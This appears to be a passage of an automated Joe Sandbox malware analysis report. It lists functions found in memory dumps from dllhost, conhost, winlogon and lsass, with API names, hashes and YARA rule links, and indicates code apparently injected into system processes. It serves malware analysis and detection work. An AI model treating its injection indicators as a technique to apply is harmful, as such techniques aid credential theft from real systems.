                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168794593-0
                                                                                                                                                          • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                                                                                                                          • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                                          Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                                                                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                                                                                                          Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                                          Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000021C0EE52EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: aaaacf6251090a20003498801bfc0ffb0978ec1ac70671345a9d0c8915545576
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 809104BBBA1258C7EB648F25D508BADB391F768BD4F7481249E690778CDA38DC12C710

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000021C0EE5962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: ca1fd64daf2b0a4948670de3ac739d6930f3f1d2858b4820c31bf69e15dfad30
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 7BD19FBB6A0748C6EB64DF65D4893DD37A0F7A9788F300215EEA957B56DB39C880C700
                                                                                                                                                          Function 0000021C0EE57050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 820b840ec2cbb8ef516a0b9ee9dd7ae91cee478e0cfee25f32560845f3e2b747
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: B581B1FA6F064DC6FB54AB65A8493D923D5ABBE780F344017AA78473D6DA38CC61C700
                                                                                                                                                          Function 0000021C0EE59EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: d9f6d747a60dbc4def380006989433280ee9dac4b52c1cb6543afb093d050c4b
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 32516FBB1E4388CAEB748F1195483E877A0F3A9B94F344225DAB947B96CB39CC51C711
                                                                                                                                                          Function 0000021C0EE580A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 76f2d898b7b1407b6ec90b707ae8de20e773f6ba73747879d65db63cbfd0fbb3
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 1751E17B3A1A48CAEB58CF15E448BAC3791F368B88F358531DA6A47788DB78CC41C704
                                                                                                                                                          Function 0000021C0EE59AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000063.00000003.2330966788.0000021C0EE50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021C0EE50000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_99_3_21c0ee50000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e354d079493dbccda08c9e50880f73bcba44bcad1dcb7cbebc356efe30ea12f0
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: B1619FB7554BC8C2EB718F15E4443DAB7A0F7E9B88F244215EBA807B96DB78C590CB00

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001FC60382EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3316853933-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 8bce46fc543ae081488779d75da3210721d0bb905b841cdb0702c637384acb33
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: CF917972B4525A87DB64DF25D6047BDB3A1F784FAAF4480309F4EA7788DA38D812D740

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001FC6038962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 9e6e4b0c9110d5ca3692e171d6a273fb2cef563f1550245383cc97ce84b37ef0
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: DFD18E3264874A86EB609F65D5803FD37B0F7857A9F140176EE8DA7B96DB38C081D780
                                                                                                                                                          Function 000001FC60387050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 8a20bbfa8dfcfe1306035f685aed67c032877c29451ab59ba31faf1f9e5c9365
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 5881F53178C60F46F750AB6596413F962B2BBC67A2F4440B5A91DF7792EB38C841B7C0
                                                                                                                                                          Function 000001FC60389EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: ca8160818863da491ee67902fb181d338932bf5fe08705d1ce015dc7c9d5fa37
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E351C37218874A8AEB748F2196443A877B0F394BA6F184176DB4DE7BC1C738C451EB81
                                                                                                                                                          Function 000001FC603880A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 0242fd2eae0423c7464daf3576405f8532a4946143b9cb06bba5e256cb04bc2d
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 3F510732359A0A8ADB54CF15E508BBD33B1F3C4BA9F154571DA5DA3788DBB8C841D780
                                                                                                                                                          Function 000001FC60389AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000065.00000003.2213063210.000001FC60380000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_101_3_1fc60380000_winlogon.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 02621d02fdd16b215d972bbfef03ced0caed4d5c80fd12044c9d96ea17b3d44b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 8161B132508BC985E7318F25E5403EAB7B0F7C5BA9F084266EB9C67B95CB78D194CB40

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00000161C7342EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 82878ac55d6fbc236b625adb97a6ecb7da2b80f5ecaa9a4faf307d6ec6648637
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 0C91697AB4115097DB68DF25D800BBDBBA1FB54B98F4C9524DE4A2B7C8DA3AD812C700

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00000161C734962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 9740bafd52b75fa44ca08665e99cbf6f70754816e2eb9dfb493b29da71e8f607
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: BCD1B07B640780AAEB68DF65D8803FD3FA4F745788F182115EE8957B9ADBB6C480C704
                                                                                                                                                          Function 00000161C7347050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 8715275c4f18c938976bb002d9272c2bd181a0d1b0ba54d8d67724864115c336
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 1181E17868124176FB9CEB769C493FD2BA1AB86780F0C7015AE0847796DAFBC845CF40
                                                                                                                                                          Function 00000161C7349EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 23d2a2badbf84a5d161b87e38df25d7b3e44fab3e80074d5616eff65742b1415
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 5251923A184280AAEB78CF2199483BC7FE0F354B95F1C6115DA9957BD5CBBAC450C706
                                                                                                                                                          Function 00000161C73480A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: e4173f24aca5bffb710f7f7a66e82975f39ad3c21218f42f8ea84a18b8822ccd
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: B451D43A351A04AAEB5CCF16E844BFC3BA1F744B98F199525DE5A47788DBBAC841C700
                                                                                                                                                          Function 00000161C7349AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000067.00000003.2274514017.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_103_3_161c7340000_lsass.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: fcf457bf67f50a1e8609c86a2075d4e929f9389816d008143e9caf8f17e6cf69
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 63617B36508BC495EB75DB15E8407EEBFA0F785B98F086215EB9807B99CBB9C190CB04